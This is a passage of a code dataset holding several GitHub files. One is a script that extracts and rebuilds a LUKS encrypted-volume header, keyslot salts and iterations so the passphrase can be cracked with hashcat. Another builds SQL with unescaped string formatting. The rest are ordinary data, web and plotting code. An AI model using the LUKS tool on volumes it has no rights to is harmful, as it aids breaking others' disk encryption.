0\n\t\t\tbinascii.hexlify(HeaderData[208+KeySlotsOffset:212+KeySlotsOffset]).decode(\"ascii\"),\n\t\t\t#Iterations - 1\n\t\t\tHeaderData[212+KeySlotsOffset:216+KeySlotsOffset], \n\t\t\t#Salt - 2\n\t\t\tHeaderData[216+KeySlotsOffset:248+KeySlotsOffset], \n\t\t\t#sector for keymaterial - 3\n\t\t\tHeaderData[248+KeySlotsOffset:252+KeySlotsOffset],\n\t\t\t#AF-stripes - 4\n\t\t\tHeaderData[252+KeySlotsOffset:256+KeySlotsOffset],\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\tKeySlotsOffset=KeySlotsOffset + 48\n\n#output of parsed Informations\n\tprint(\"##############################################################################################################\\n\")\n\tprint(\"Basic-Data\")\n\tprint(\"----------\")\n\tprint(\"Date/ Time (YYYY-MM-DD HH:MM:SS): \" + str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%d\")))\n\tprint(\"FileName(arg1): \" + sys.argv[1])\n\tprint(\"ScriptName(arg0): \" + sys.argv[0])\n\tprint(\"Filepath: \" + FilePath)\n\tprint(\"############################################################\\n\")\n\tprint(\"Luks-Basic-Data\")\n\tprint(\"---------------\")\n\tprint(\"LUKS-Magic: \" + str(binascii.hexlify(LUKSMagic).decode(\"ascii\")))\n\tprint(\"LUKS-Version: \" + str(binascii.hexlify(LUKSVersion).decode(\"ascii\")))\n\tprint(\"LUKS-CipherName: \" + codecs.decode(LUKSCipherName, 'utf-8')) \n\tprint(\"LUKS-CipherMode: \" + codecs.decode(LUKSCipherMode, 'utf-8'))\n\tprint(\"LUKS-CipherSpec: \" + codecs.decode(LUKSCipherSpec, 'utf-8'))\n\tprint(\"LUKS-PayloadOffset (Hex): \" + str(binascii.hexlify(LUKSPayloadOffset).decode(\"ascii\")))\n\tprint(\"LUKS-KeyBytes: \" + str(binascii.hexlify(LUKSKeyBytes).decode(\"ascii\")))\n\tprint(\"LUKS-Masterkey: \" + 
str(binascii.hexlify(LUKSMasterkey).decode(\"ascii\")))\n\tprint(\"LUKS-MasterkeySalt: \" + str(binascii.hexlify(LUKSMasterkeySalt).decode(\"ascii\")))\n\tprint(\"LUKS-MasterkeyIterations: \" + str(int(binascii.hexlify(LUKSMasterkeyIterations),16)))\n\tprint(\"LUKS-UUID: \" + codecs.decode(LUKSUUID, 'utf-8'))\n\tprint(\"##############################################################################################################\\n\")\n\n\n#if PayLoadoffset> 4096 read/copy 1. payloadsector\n\tif PayloadOffset > 4096:\n\t\tprint(\"PayloadOffset is > 4096, use PayloadSector \" + str(PayloadOffset) + \".\\n\")\n\t\tprint(\"###########################################################\\n\")\n\t\tf = open(sys.argv[1], 'rb')\n\t\tPayloadOffsetData = f.read(512 * (PayloadOffset + 1))\n\t\tPayloadData = HeaderData[592:2097152] + PayloadOffsetData[102400000:102400512]\n\t\tBitList = ['00','00','10','00']\n\t\tPayLoadBinData = binascii.a2b_hex(''.join (BitList))\n\t\tHeaderDataTMP = HeaderData[:104] + PayLoadBinData + HeaderData[108:208]\n\t\tf.close()\n\n\tprint(\"Luks-Keyslot-Data\\n\")\n\tprint(\"Status\t\tSlotNumber\tIterations\tMeyMaterialSector\tAF-Stripes\")\n\tprint(\"----------------------------------------------------------------------------------\")\n#find active Keys\n\tPossibleKeyslots = []\n\tfor key in LUKSKeyValues.keys():\n\t\tif LUKSKeyValues[key][0][4:8] != \"dead\":\n#somtimes i see different values in Field0 :S\n\t\t\tif str(LUKSKeyValues[key][0]) == \"00ac71f3\": # is active keyslot\n\t\t\t\tprint(\"ACTIVE-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16)) + \"\t\t\" + str(\"%#5.4X\"% (int(binascii.hexlify(LUKSKeyValues[key][3]).decode(\"ascii\"),16))) + \"\t\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][4]).decode(\"ascii\"),16)))\n\t\t\t\tPossibleKeyslots.append(key)\n\t\t\telse:\n\t\t\t\tprint(\"ACTIVE-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16))\n\t\t\t\t\t\t\t + \" Iterations - !!! ATTENTION, ABNORMAL Field0.Value: \" + str(LUKSKeyValues[key][0]) + \" !!!\")\n\t\t\t\tPossibleKeyslots.append(key)\n\t\telse:\n#find dead Keys - sometimes (valid?) data inside...\n\t\t\tif int((binascii.hexlify(LUKSKeyValues[key][1])).decode(\"ascii\"),16) != 0:\n\t\t\t\tprint(\"DEAD-Slot:\t\" + str(key) + \"\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][1]).decode(\"ascii\"),16)) + \"\t\t\" + str(\"%#5.4X\"% (int(binascii.hexlify(LUKSKeyValues[key][3]).decode(\"ascii\"),16))) + \"\t\t\t\" + str(int(binascii.hexlify(LUKSKeyValues[key][4]).decode(\"ascii\"),16)))\n\t\t\t\tprint (\"!!! ATTENTION on KeySlot \" + str(key) + \", ABNORMAL Field0.Value: \" + str(LUKSKeyValues[key][0]) + \", check KeySlots- and KeyMaterialentrys !!!\")\n\t\t\t\tPossibleKeyslots.append(key)\n#if u like empty entries...\n\t\t\telse:\n\t\t\t\tprint(\"EMPTY-Slot:\t\" + str(key) + \"\t\t-\" + \"\t\t-\" + \"\t\t\t-\")\n\tprint(\"##################################################################################\\n\")\n\n#rebuild the LuksHeader\n\tintKeySlot = \"\"\n\twhile (not intKeySlot) and (not intKeySlot in PossibleKeyslots):\n\t\tintKeySlot = raw_input(\"Which KeySlot should be used? 
Possible is \" + str(PossibleKeyslots) + \": \") \n\t\tif not intKeySlot in str(PossibleKeyslots):\n\t\t\tprint('Your Input is not a possible KeySlot, exiting Script')\n\t\t\treturn\n\n\tintKeySlot = int(intKeySlot)\n\n#rewrite LuksHeader\n\tprint(\"\\nYour Choice is KeySlot\" + str(intKeySlot) + \".\\n\")\n\tFilePathTMP = FilePath + \"_KeySlot\" + str(intKeySlot) + \".bin\"\n\tFileInt = 1\n\twhile os.path.isfile(FilePathTMP):\n\t\tFilePathTMP = FilePath + \"_KeySlot\" + str(intKeySlot) + \"(\" + str(FileInt) + \")\" + \".bin\"\n\t\tFileInt += 1\n\tFilePath = FilePathTMP\n\tprint(\"Write to File: \" + FilePath)\n\tf = open(FilePath, 'wb')\n\tf.write(HeaderData[:208]) \n\t\n#write KeySlots\t\n\tByteListDEADKeyFirst=['00','00','DE','AD','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00','00','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00','00','00','00','00','00','00','00','00','00','00',\n\t\t\t\t\t '00','00','00']\n\tByteListDEADKeyThird=['08','00','00','0F','A0']\n\tfor i in 0,1,2,3,4,5,6,7:\n\t\tif intKeySlot == i:\n\t\t\tByteList=['00','AC','71','F3'] \t\t\t\t\t\t\t\t\t\t\t#set activ\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteList)))\n\t\t\tf.write(LUKSKeyValues[intKeySlot][1]) \t\t\t\t\t\t\t\t\t#iterations\n\t\t\tf.write(LUKSKeyValues[intKeySlot][2])\t\t\t\t\t\t\t\t\t#salt\n\t\t\tf.write(LUKSKeyValues[intKeySlot][3])\t\t\t\t\t\t\t\t\t#sector KeyMaterial\n\t\t\tf.write(LUKSKeyValues[intKeySlot][4])\t\t\t\t\t\t\t\t\t#AF\n\t\telse:\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteListDEADKeyFirst)))\n\t\t\tf.write(binascii.a2b_hex(\"0\" + str(i)))\n\t\t\tf.write(binascii.a2b_hex(''.join (ByteListDEADKeyThird)))\n\tf.write(PayloadData)\n\tf.close()\n\n\treturn\n\t\nif __name__ == '__main__':\n\tmain(sys.argv)\n","repo_name":"paule965/LuksHeader4Hashcat","sub_path":"LuksHeader4Hashcat.py","file_name":"LuksHeader4Hashcat.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"24226300096","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nName: PyAnime4K pip setup file\nAuthor: TianZerL\nEditor: K4YT3X, TianZerL\n\"\"\"\n\nimport setuptools, os\nfrom pyanime4k.ac import Version\n\ncurr_path = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(curr_path, \"README.md\"), \"r\") as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"pyanime4k\",\n version=Version.pyanime4k,\n author=\"TianZer\",\n description=\"An easy way to use anime4kcpp in python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n keywords=[\"anime\", \"anime4k\", \"anime4kcpp\", \"upscale\"],\n url=\"https://github.com/TianZerL/pyanime4k\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.0\",\n include_package_data=True,\n install_requires=[\"ffmpeg-python >= 0.2.0\", \"numpy >= 1.17.3\"],\n)\n","repo_name":"TianZerL/pyanime4k","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"53"} +{"seq_id":"75052931688","text":"from RePoE.parser.util import write_json, call_with_default_args\nfrom RePoE.parser import Parser_Module\n\n\nclass characters(Parser_Module):\n @staticmethod\n def 
write(file_system, data_path, relational_reader, translation_file_cache, ot_file_cache):\n root = []\n for row in relational_reader[\"Characters.dat\"]:\n root.append(\n {\n \"metadata_id\": row[\"Id\"],\n \"integer_id\": row[\"IntegerId\"],\n \"name\": row[\"Name\"],\n \"base_stats\": {\n \"life\": row[\"BaseMaxLife\"],\n \"mana\": row[\"BaseMaxMana\"],\n \"strength\": row[\"BaseStrength\"],\n \"dexterity\": row[\"BaseDexterity\"],\n \"intelligence\": row[\"BaseIntelligence\"],\n \"unarmed\": {\n \"attack_time\": row[\"WeaponSpeed\"],\n \"min_physical_damage\": row[\"MinDamage\"],\n \"max_physical_damage\": row[\"MaxDamage\"],\n \"range\": row[\"MaxAttackDistance\"],\n },\n },\n }\n )\n write_json(root, data_path, \"characters\")\n\n\nif __name__ == \"__main__\":\n call_with_default_args(characters.write)\n","repo_name":"brather1ng/RePoE","sub_path":"RePoE/parser/modules/characters.py","file_name":"characters.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":258,"dataset":"github-code","pt":"53"} +{"seq_id":"74950233128","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport h5py\nimport torch.utils.data as data\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nclass my_dataset(data.Dataset):\n def __init__(self,mat_data):\n gt_set = mat_data['gt'][...]\n gt_set = np.transpose(gt_set,(3,0,1,2))\n pan_set = mat_data['pan'][...]\n pan_set = np.transpose(pan_set,(2,0,1))\n pan_set = pan_set[:,np.newaxis,:,:]\n ms_set = mat_data['ms'][...]\n ms_set = np.transpose(ms_set,(3,0,1,2))\n lms_set = mat_data['lms'][...]\n lms_set = np.transpose(lms_set,(3,0,1,2))\n self.gt_set = np.array(gt_set,dtype = np.float32) / 1.\n self.pan_set = np.array(pan_set, dtype = np.float32) /1.\n self.ms_set = np.array(ms_set, dtype = np.float32) / 1.\n self.lms_set = np.array(lms_set, dtype = np.float32) /1.\n \n def __getitem__(self, index):\n gt = self.gt_set[index,:,:,:]\n pan = self.pan_set[index,:,:]\n ms = self.ms_set[index,:,:,:]\n lms = self.lms_set[index,:,:,:]\n return gt, pan, lms, ms\n \n def __len__(self):\n return self.gt_set.shape[0]\n\nif __name__ == \"__main__\":\n validation_data_name = 'data.mat' #your data path\n validation_data = h5py.File(validation_data_name,'r')\n validation_dataset = my_dataset(validation_data)\n del validation_data\n data_loader = torch.utils.data.DataLoader(validation_dataset, batch_size=1, shuffle=False) \n for index,item in enumerate(data_loader):\n print(index) \n print(type(item[2]))\n\n","repo_name":"TingMAC/FrMLNet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35046811579","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.gis.geos import Point\nfrom bagni.models import Bagno, Neighbourhood, Municipality, District\nfrom optparse import make_option\nimport requests\nimport json\nimport logging\nimport hashlib\n\nlogging.basicConfig()\nlogger = logging.getLogger(\"bagni.console\")\n#logger.setLevel(logging.WARNING)\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument('--startfrom', '-s', type=int)\n parser.add_argument('--limit', '-l', type=int)\n\n def handle(self, *args, **options):\n logger.info(\"Restoring Neighbourhood Municipalities Districts\")\n Municipality.objects.all().delete()\n District.objects.all().delete()\n Neighbourhood.objects.all().delete()\n 
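# the per-city scraper outputs below are merged into one list, then geocoded with a local JSON cache
        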
bagni = []\n cities = [\"cervia\", \"cesenatico\", \"ferrara\", \"ravenna\", \"rimini\", \"riccione\", \"bellaria-igea-marina\"]\n for city in cities:\n try:\n with open('scripts/scraping/output_' + city + '.json', 'r') as output_file:\n bagni += json.load(output_file)\n except IOError:\n raise CommandError(\"cannot open 'scripts/scraping/output_\" + city + \".json' Have you generated it?\")\n with open(\"restore_cities.json\", 'r') as outfile:\n cache = json.load(outfile)\n base_url = \"https://maps.googleapis.com/maps/api/geocode/json?latlng={}&sensor=true\"\n if 'limit' in options and options['limit'] < len(bagni):\n bagni = bagni[:options['limit']]\n if 'startfrom' in options and options['startfrom'] < len(bagni):\n bagni = bagni[options['startfrom']:]\n tot = len(bagni)\n for count, bagno in enumerate(bagni):\n n = m = d = None\n n_name = m_name = d_name = None\n text_point = \",\".join(bagno['coords'])\n point = Point([float(coord) for coord in reversed(bagno['coords'])])\n try:\n name = bagno['name'].replace(\"- 82 \", \"\")\n if name in [\"Alcide Spiaggia\", \"Alberto\"]:\n name = \"Bagno \" + name\n b = Bagno.objects.filter(name=name)\n if len(b) == 1:\n b = b[0]\n else:\n b = b.get(point=point)\n except:\n import ipdb; ipdb.set_trace()\n h = hashlib.sha224(bagno['name'].encode('ascii', errors='ignore') + text_point).hexdigest()\n if h in cache:\n (n_name, m_name, d_name) = cache[h]\n else:\n url = base_url.format(text_point)\n try:\n r = requests.get(url)\n result = json.loads(r.content)\n\n if not b:\n import ipdb; ipdb.set_trace()\n pass\n except Exception as ex:\n import ipdb; ipdb.set_trace()\n ex\n pass\n\n for address_part in result['results'][0]['address_components']:\n if \"locality\" in address_part['types']:\n json_neighbourhood = bagno.get(\"neighbourhood\", None)\n if json_neighbourhood and json_neighbourhood != address_part[\"long_name\"]:\n n_name = json_neighbourhood\n else:\n n_name = address_part[\"long_name\"]\n elif \"administrative_area_level_3\" in address_part['types']:\n m_name = address_part[\"long_name\"]\n elif \"administrative_area_level_2\" in address_part['types']:\n d_name = address_part[\"long_name\"]\n if not (n_name and m_name and d_name):\n if not n_name:\n if \"neighbourhood\" in bagno and bagno[\"neighbourhood\"]:\n n_name = bagno['neighbourhood']\n elif bagno['address'] == \"Fontanelle Abissinia\":\n n_name = \"Riccione\"\n else:\n import ipdb; ipdb.set_trace()\n elif n_name == \"Torre Pedrera\":\n m_name = d_name = \"Rimini\"\n else:\n import ipdb; ipdb.set_trace()\n if bagno['address'] == \"Via Spazzoli Tonino, 3\":\n b.address = \"Via Giovanni Spallazzi, 1\"\n b.save()\n if n_name == \"Casalborsetti\":\n n_name = \"Casal Borsetti\"\n cache[h] = (n_name, m_name, d_name)\n with open(\"restore_cities.json\", 'w') as outfile:\n json.dump(cache, outfile)\n d = District.objects.filter(name=d_name)\n if not d:\n logger.info(\"creating district %s\" % d_name)\n d = District(name=d_name)\n d.save()\n else:\n d = d[0]\n m = Municipality.objects.filter(name=m_name)\n if not m:\n logger.info(\"creating municipality %s\" % m_name)\n m = Municipality(name=m_name)\n m.district = d\n m.save()\n else:\n m = m[0]\n\n n = Neighbourhood.objects.filter(name=n_name)\n if not n:\n logger.info(\"creating neighbourhood %s\" % n_name)\n n = Neighbourhood(name=n_name)\n n.municipality = m\n n.save()\n else:\n n = n[0]\n b.neighbourhood = n\n logger.info(\"[%d/%d]assigning neighbourhood %s municipality %s city %s to bagno %s\" % (count, tot, n.name, m.name, d.name, 
b.name, ) )\n b.save()\n","repo_name":"parruc/bagnialmare","sub_path":"bagni/management/commands/restore_cities.py","file_name":"restore_cities.py","file_ext":"py","file_size_in_byte":5810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28529944907","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport matplotlib\nfrom math import sqrt\n\n\n\n\n\n\nMARKERLIST = ['o','x','d','+','^','*', 's']\nwith open(\"/Users/x/hashtable_benchmark_laptop.json\",\"r\") as file:\n data = json.load(file)\nlabels = []\ncputime = []\nsamplesize = []\nplotData = dict()\nalgs = set()\nsizes = set()\nfor x in data[\"benchmarks\"]:\n if '/' in x[\"name\"]:\n # labels.append(x[\"name\"].split(\"/\")[0])\n # cputime.append(float(x[\"cpu_time\"]))\n # samplesize.append(int(x[\"name\"].split(\"/\")[1]))\n sampleS = int(x[\"name\"].split(\"/\")[1])\n name = x[\"name\"].split(\"/\")[0]\n cpuT = float(x[\"cpu_time\"])\n algs.add(name)\n sizes.add(sampleS)\n if name in plotData:\n plotData[name].append([sampleS,sampleS/cpuT])\n else:\n plotData[name] = []\n plotData[name].append([sampleS,sampleS/cpuT])\nprint(plotData)\nalgoCount = len(algs)\nsizeCount = len(sizes)\n\nwidth = 0.6\nxlist = []\nylist = []\nlabels = []\ncounter = 0\nfor x in plotData:\n xlist.append([])\n ylist.append([])\n labels.append(x)\n for y in plotData[x]:\n xlist[len(xlist)-1].append(\"{:.0e}\".format(y[0]))\n ylist[len(ylist)-1].append(y[1])\n\nfont = {'family' : 'serif',\n 'size' : 10}\n\nmatplotlib.rc('font', **font)\nfor i in range(0,len(xlist)):\n plt.plot(xlist[i],ylist[i],marker=MARKERLIST[i], label=labels[i])\nplt.xlabel('element size')\nplt.ylabel('throughput in elements/ms')\nplt.tight_layout()\nplt.legend()\n\nplt.savefig(\"x.pdf\")\n\nplt.show()\n","repo_name":"MartinFritz/ba_thesis","sub_path":"jsonparser3.py","file_name":"jsonparser3.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20344094724","text":"from django.shortcuts import render, redirect\n# Article.objects를 위해 import 한다.\nfrom .models import Article\n\n# Create your views here.\n\n\ndef index(request):\n # 데이터 베이스에서 모든 값을 뽑아온다.\n articles = Article.objects.all()\n context = {\n 'articles': articles,\n }\n return render(request, 'articles/index.html', context)\n\n\ndef new(request):\n return render(request, 'articles/new.html')\n\n\ndef create(request):\n # 1. new에서 보낸 데이터 받기\n # CSRF 검증에 실패했습니다. 요청을 중단하였습니다.\n # POST의 경우에는 보통 데이터베이스에 조작을 가하기 때문에 최소한의 신원확인이 필수이다.\n title = request.POST.get('title')\n content = request.POST.get('content')\n\n # 2. db에 저장\n # article = Article()\n # article.title = title\n # article.content = content\n # article.save()\n\n article = Article(title=title, content=content)\n # 데이터가 유효한지 검사\n # 데이터를 저장할 타이밍이 나온다.\n article.save()\n article.pk\n # 이건 데이터를 저장할 시간이 안나온다. 
그래서 잘 안쓰임\n    # Article.objects.create(title=title, content=content)\n\n    # return render(request, 'articles/index.html')\n    return redirect('articles:detail', article.pk)\n    # return redirect('articles:index')\n\n\ndef detail(request, pk):\n    # 뒤에있는 값으로 찾는다.\n    article = Article.objects.get(pk=pk)\n    context = {\n        'article': article,\n    }\n\n    return render(request, 'articles/detail.html', context)\n\n\ndef delete(request, pk):\n    if request.method == 'POST' :\n        article = Article.objects.get(pk=pk)\n        article.delete()\n        return redirect('articles:index')\n    else :\n        return redirect('articles:detail',pk)\n\n\ndef edit(request, pk) :\n    article = Article.objects.get(pk=pk)\n    context = {\n        'article' : article,\n    }\n    return render(request,'articles/edit.html',context)\n\n\ndef update(request, pk) :\n    article = Article.objects.get(pk=pk)\n    title = request.POST.get('title')\n    content = request.POST.get('content')\n\n    article.title = title\n    article.content = content\n    article.save()\n\n    return redirect('articles:detail',pk)","repo_name":"Alphanewbie/Django","sub_path":"01_django_orm/crud/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20108999483","text":"import csv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# with seaborn available, the plots look nicer\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfile = 'sample.csv'\nusecols = [1,133]\nskiprows = [0,1,2,3,4,5]\nnames = [\"Time\",\"Between-the-hand\"]\ndf = pd.read_csv(file,usecols=usecols,skiprows=skiprows,names=names,header=None)\n# print(df)\nprint(df[\"Between-the-hand\"])\n# print(df.query(\"Time <= 10\"))\n\n# below this point, try a 3-D plot\n# extract only the Top.head_X column\nlimit_time = 20\nX = df.query(\"Time <= %i\"%limit_time)[names[0]]\nY = df.query(\"Time <= %i\"%limit_time)[names[1]]\n# Z = df.query(\"Time <= %i\"%limit_time)[\"Top.head_Z\"]\n# print(len(X))\n# fig = plt.figure()\nplt.figure()\n# ax = Axes3D(fig)\nl=0\nt = len(X)-1\nb=0\na=0\ns=t-b\nwhile(l<=t):\n    while(a<=s):\n        plt.plot(X[l:t+1],Y[l:t+1],\n        c=((a/s)*1.0,0.0,((s-a)/s)*1.0),lw=0.5)\n        l=l+1\n        a=a+1\nplt.xlabel(names[0])\nplt.ylabel(names[1])\n# ax.set_zlabel(\"Top.head_Z\")\nplt.show()","repo_name":"masaki0114/labo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23172592122","text":"from fastapi import status, HTTPException, Depends, APIRouter\nfrom sqlalchemy.orm import Session\nfrom .. 
import models, schemas, database, oauth2\n\n\n\n\nrouter = APIRouter(\n prefix='/posts',\n tags= ['Posts'] # group the posts in Posts catagory in 127.0.0.1:8000/docs\n)\n\n\n\n\n# read all post\n@router.get('/', response_model=list[schemas.Post])\ndef get_posts(db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user),\n limit: int = 10):\n posts = db.query(models.Post).limit(limit).all()\n\n # get all posts of a specific user id\n # posts = db.query(models.Post).filter(models.Post.user_id == current_user.id).all()\n\n return posts\n\n\n# read single post\n@router.get('/{id}', response_model=schemas.Post)\ndef get_post_detail(id: int, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post = db.query(models.Post).filter(models.Post.id == id).first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} was not found')\n return post\n\n\n# create post\n@router.post('/create', status_code=status.HTTP_201_CREATED, response_model=schemas.Post)\ndef create_post(post: schemas.PostCreate, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n\n # new_post = models.Post(title=post.title, content=post.content, published=post.published)\n new_post = models.Post(user_id = current_user.id, **post.model_dump())\n \n db.add(new_post)\n db.commit()\n db.refresh(new_post)\n\n return new_post\n\n\n# update post \n@router.put('/{id}', response_model=schemas.Post)\ndef create_post(id: int, \n updated_post: schemas.PostUpdate, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n post = post_query.first()\n\n if post is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} does not exist!')\n \n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail='Not authorized to perform requested action!')\n \n post_query.update(updated_post.model_dump(), synchronize_session=False)\n db.commit()\n\n return post\n\n\n# delete post\n@router.delete('/{id}', status_code=status.HTTP_204_NO_CONTENT)\ndef delete_post(id: int, \n db: Session = Depends(database.get_db),\n current_user: int = Depends(oauth2.get_current_user)):\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n post = post_query.first()\n\n if post is None:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f'Post with id: {id} does not exist!')\n \n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail='Not authorized to perform requested action!')\n \n post_query.delete(synchronize_session=False)\n db.commit()\n return {'message': 'post deleted'}\n\n\n\n\n\n\n\n","repo_name":"rhsajib/api-design-for-social-media-app","sub_path":"app/routers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23046791584","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.express as px\n\ndata = pd.read_csv('./assets/CSV/Students.csv')\ndata.sort_values('FIO', inplace=True)\n\nexternal_stylesheets = [\n {\n 'href': 'https://fonts.googleapis.com/css2?'\n 
'family=Lato:wght@400;700&display=swap',\n 'rel': 'stylesheet',\n },\n]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ncolors = {\n 'background': '#2A335E',\n 'text': 'White',\n 'color': '#4878FB',\n 'gridColor': '#3F4670',\n}\n\npie = px.pie(data, labels=[1, 2, 3, 4, 5], values=data['Math'])\n\nline = px.line(data, x=data['FIO'],\n y=data['Math'], hover_name=data['FIO'])\n\nline.update_xaxes(visible=True, fixedrange=True, gridcolor=colors['gridColor'])\nline.update_yaxes(visible=True, fixedrange=True, gridcolor=colors['gridColor'])\n\nline.update_layout(\n title='Оценки по курсу \"Математика\"',\n plot_bgcolor=colors['background'],\n paper_bgcolor=colors['background'],\n font_color=colors['text'],\n font_size=14,\n font_family='Monospace',\n)\n\n\napp.layout = html.Div(\n\n children=[\n html.Nav(\n children=[\n html.Img(src='./assets/icons/user.png', className='Img'),\n html.Img(src='./assets/icons/course.png', className='Img'),\n html.Img(src='./assets/icons/settings.png', className='Img'),\n ],\n id=\"nav\"\n ),\n html.Div(\n children=[\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n html.Div(children=dcc.Graph(figure=line), className='Graph'),\n ],\n id='graphBlocks'\n )\n ],\n id='main'\n)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Pointer90/Admin_panel","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12672483789","text":"import argparse\nimport re\nimport sys\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Modify Wordpress database dump.')\n parser.add_argument(\n '--old-url',\n type=str,\n help='the old URL e.g. http://www.oldurl.com',\n required=True\n )\n parser.add_argument(\n '--new-url',\n type=str,\n default='http://localhost:8000',\n help='the new URL e.g. 
http://www.newurl.com',\n )\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n # Find out what the options, postmeta and posts tables are called from the\n # database dump.\n table_names = {}\n table_mappings = {\n 'wp_options' : 'options',\n 'wp_postmeta': 'postmeta',\n 'wp_posts': 'posts'\n }\n for line in sys.stdin:\n if line.startswith('CREATE TABLE'):\n table_name = line.split('`')[1]\n for k, v in table_mappings.iteritems():\n if table_name.endswith(v):\n table_names[k] = table_name\n print(line)\n\n change = (args.old_url, args.new_url)\n\n print(\"-- Added by %s\" % sys.argv[0])\n\n print(\"UPDATE wp_options SET option_value = replace(option_value, '%s', '%s') WHERE option_name = 'home' OR option_name = 'siteurl';\" % change)\n\n print(\"UPDATE wp_posts SET guid = replace(guid, '%s', '%s');\" % change)\n\n print(\"UPDATE wp_posts SET post_content = replace(post_content, '%s', '%s');\" % change)\n\n print(\"UPDATE wp_postmeta SET meta_value = replace(meta_value, '%s', '%s');\" % change)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nlindblad/wordpress-development","sub_path":"utils/modify_database_dump.py","file_name":"modify_database_dump.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28764139105","text":"from google_sheets_reader.src.team_members import TeamMembers\nfrom google_sheets_reader.src.progress_data import ProgressData\nfrom google_sheets_reader.constants import Constants\nfrom google_sheets_reader.src.progress_data import Status\nfrom datetime import datetime\n\n\n# Only add tasks which have been updated today\ndef _check_date(listed_date: str) -> bool:\n today = _get_today()\n if not listed_date.__eq__(today):\n return False\n return True\n\n\ndef _get_today() -> str:\n return datetime.today().strftime(\"%Y/%m/%d\")\n\n# return false if given member is not a team member\ndef _check_member(member: str) -> bool:\n if member.__eq__(TeamMembers.Simon) or member.__eq__(TeamMembers.Andreas) or member.__eq__(TeamMembers.Tom) or member.__eq__(TeamMembers.Jesse):\n return True\n return False\n\n\ndef _check_finished(status: str) -> bool:\n return status.__eq__(Status.Finished)\n\n\ndef _check_not_started(status: str) -> bool:\n return 